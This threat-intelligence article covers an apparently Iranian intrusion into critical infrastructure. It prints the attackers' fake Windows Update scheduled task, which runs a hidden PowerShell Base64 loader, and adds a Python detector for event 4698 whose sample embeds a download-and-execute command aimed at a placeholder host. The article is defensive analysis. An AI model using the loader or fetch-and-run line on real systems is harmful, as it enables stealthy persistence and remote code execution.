A sophisticated cyber intrusion targeting critical national infrastructure in the Middle East has been uncovered, with evidence pointing to an Iranian state-sponsored threat group.
The intrusion that was investigated ran from May 2023 to February 2025, but forensic evidence points to an initial compromise as early as May 2021, indicating a long-term operation aimed at intelligence gathering and prepositioning for possible future disruptive attacks on essential services.
The threat actors initially gained access through compromised VPN credentials, subsequently deploying multiple web shells on public-facing servers to establish footholds within the victim’s environment.
From these initial access points, the attackers methodically expanded their presence, installing the open-source Havoc C2 framework alongside the custom backdoors HanifNet, HXLibrary, and NeoExpressRAT.
These tools gave the operators command execution, file transfer and manipulation, and system and network discovery across the compromised infrastructure.
Fortinet researchers highlighted the attackers' sustained effort to defeat network segmentation, the control meant to stop exactly this kind of lateral movement.
The adversaries chained open-source proxying and tunneling tools (plink, Ngrok, glider proxy, and ReverseSocks5) to cross security boundaries and reach restricted network segments, including some potentially connected to operational technology (OT) environments.
Among the most technically significant aspects of this intrusion was the deployment of custom malware variants.
The HanifNet backdoor represents a sophisticated .NET-based tool designed for maintaining persistent access to compromised systems.
Its communication with command and control infrastructure was carefully obfuscated to evade traditional security monitoring.
Analysis of its execution pattern shows how persistence was anchored in a scheduled task that masquerades as a Windows Update job: the task is created under the \Microsoft\Windows\WindowsUpdate folder, runs daily as SYSTEM, and launches mshta.exe with inline JavaScript that spawns a hidden PowerShell process to decode and execute a Base64-encoded payload:
schtasks /create /tn "\Microsoft\Windows\WindowsUpdate\UpdateCheck" /tr "C:\Windows\System32\mshta.exe javascript:eval('new ActiveXObject(\'WScript.Shell\').Run(\'powershell -w h -c iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\\\'BASE64_ENCODED_PAYLOAD\\\')))\',0);window.close()')" /sc DAILY /st 15:45 /ru "SYSTEM"
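A task like the one above leaves a Windows Security event 4698 (scheduled task created) whose TaskContent field carries the task XML, so the action's command line can be triaged without ever running the task. The script below is an added example written for this article, not code from Fortinet or from the malware: it parses constructed 4698-style records (the first mirrors the schtasks line above, the second is a benign Windows time-sync task), flags living-off-the-land indicators (mshta with an inline script, WScript.Shell process spawning, a hidden PowerShell window, a Base64-encoded payload, Invoke-Expression) and decodes the embedded payload so an analyst can see the second stage. The second-stage command and the 198.51.100.7 address are invented for the sample.

```python
"""Triage Windows event 4698 (scheduled task created) records for
mshta/PowerShell persistence of the kind shown in the article.
Added example; the event records below are constructed, not real telemetry."""
import base64
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Hypothetical second stage, used only to build the constructed sample task.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/u')"
STAGE2_B64 = base64.b64encode(STAGE2.encode("utf-8")).decode("ascii")

# Argument string as it would be stored in the task, mirroring the article's command.
MSHTA_ARGS = (
    r"javascript:eval('new ActiveXObject(\'WScript.Shell\').Run(\'powershell -w h -c "
    r"iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\\\'"
    + STAGE2_B64 +
    r"\\\')))\',0);window.close()')"
)


def task_xml(command, arguments, user_id="S-1-5-18"):
    """Minimal TaskContent XML in the shape event 4698 carries (constructed)."""
    return (
        '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f'<Principals><Principal id="Author"><UserId>{user_id}</UserId></Principal></Principals>'
        f'<Actions><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec></Actions>'
        '</Task>'
    )


SAMPLE_EVENTS = [
    {   # constructed: the persistence task from the article, created by a web service account
        "TaskName": r"\Microsoft\Windows\WindowsUpdate\UpdateCheck",
        "SubjectUserName": "svc_web",
        "TaskContent": task_xml(r"C:\Windows\System32\mshta.exe", MSHTA_ARGS),
    },
    {   # constructed: a legitimate built-in task, for contrast
        "TaskName": r"\Microsoft\Windows\Time Synchronization\SynchronizeTime",
        "SubjectUserName": "SYSTEM",
        "TaskContent": task_xml(r"%windir%\system32\sc.exe", "start w32time task_started"),
    },
]

# (regex over the reconstructed command line, human-readable reason)
INDICATORS = [
    (r"(?i)\bmshta\.exe\b.*\b(?:javascript|vbscript):", "mshta running an inline script"),
    (r"(?i)ActiveXObject\(\\*['\"]WScript\.Shell", "script spawns a process via WScript.Shell"),
    (r"(?i)\bpowershell(?:\.exe)?\b.*-w(?:indowstyle)?\s+h(?:idden)?\b", "hidden PowerShell window"),
    (r"(?i)FromBase64String|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", "Base64-encoded PowerShell payload"),
    (r"(?i)\biex\b|Invoke-Expression", "Invoke-Expression of dynamic content"),
]


def decode_payload(cmdline):
    """Return the decoded Base64 payload from a FromBase64String(...) or -EncodedCommand
    argument, or None. -EncodedCommand is UTF-16LE; the loader above uses UTF-8."""
    m = (re.search(r"""FromBase64String\([\\'"\s]*([A-Za-z0-9+/=]{16,})""", cmdline)
         or re.search(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline))
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return None
    # UTF-16LE ASCII text has a NUL at every odd offset; use that to pick the codec.
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def triage_event(event):
    """Parse one 4698 record and return a verdict with the reasons behind it."""
    root = ET.fromstring(event["TaskContent"])
    exec_node = root.find(f"./{NS}Actions/{NS}Exec")
    command = (exec_node.findtext(f"{NS}Command") or "").strip() if exec_node is not None else ""
    arguments = (exec_node.findtext(f"{NS}Arguments") or "").strip() if exec_node is not None else ""
    user_id = root.findtext(f"./{NS}Principals/{NS}Principal/{NS}UserId") or ""
    cmdline = f"{command} {arguments}".strip()

    reasons = [label for pattern, label in INDICATORS if re.search(pattern, cmdline)]
    # Context that raises severity once an indicator has fired.
    if reasons and user_id == "S-1-5-18":
        reasons.append("runs as SYSTEM")
    if reasons and event["TaskName"].lower().startswith("\\microsoft\\windows\\"):
        reasons.append("hides under the \\Microsoft\\Windows task folder")
    return {
        "task": event["TaskName"],
        "created_by": event["SubjectUserName"],
        "command_line": cmdline,
        "suspicious": bool(reasons),
        "reasons": reasons,
        "decoded_payload": decode_payload(cmdline),
    }


def flagged_tasks(events):
    """Triage a batch of 4698 records and keep only the suspicious ones."""
    return [v for v in (triage_event(e) for e in events) if v["suspicious"]]


if __name__ == "__main__":
    for verdict in flagged_tasks(SAMPLE_EVENTS):
        print(f"[!] {verdict['task']} (created by {verdict['created_by']})")
        for reason in verdict["reasons"]:
            print(f"    - {reason}")
        print(f"    decoded payload: {verdict['decoded_payload']}")
```

On a real host, feed the function the EventData fields of 4698 records exported from the Security log (for example via wevtutil or a SIEM); the task XML there also includes Triggers and Settings, which the parser ignores. The Base64 decode is the step worth keeping: it turns an opaque task action into the actual second-stage command, which is what you need to pivot on.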
The attackers also employed HXLibrary, a malicious IIS module providing deep system control, and NeoExpressRAT, a Golang-based backdoor with hardcoded C2 communication capabilities.
These tools demonstrate the evolving capability set of Iranian cyber operators and highlight the continued threat to critical infrastructure globally.